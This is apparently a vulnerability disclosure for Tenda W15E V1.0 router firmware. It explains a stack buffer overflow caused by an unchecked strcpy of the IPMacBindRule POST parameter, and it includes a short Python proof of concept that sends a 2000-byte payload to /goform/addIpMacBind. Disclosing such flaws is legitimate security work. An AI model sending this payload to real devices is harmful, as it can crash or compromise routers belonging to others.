- Firmware download website: https://www.tendacn.com/download/detail-2722.html
W15EV1.0 V15.11.0.14
The Tenda W15EV1.0 V15.11.0.14 firmware has a stack overflow vulnerability in the formIPMacBindAdd function. The rules variable receives the IPMacBindRule parameter from a POST request and is passed to function ipMacBindListStore as listStr.
In function ipMacBindListStore, the listStr is directly assigned to inputList. However, since the user can control the input of IPMacBindRule, the statement strcpy((char *)&inputList, (const char *)listStr); can cause a buffer overflow. The user-provided IPMacBindRule can exceed the capacity of the inputList array, triggering this security vulnerability.
import requests
from pwn import*
ip = "192.168.84.101"
url = "http://" + ip + "/goform/addIpMacBind"
payload = b"a"*2000
data = {
'IPMacBindRule':payload,
}
response = requests.post(url, data=data)
print(response.text)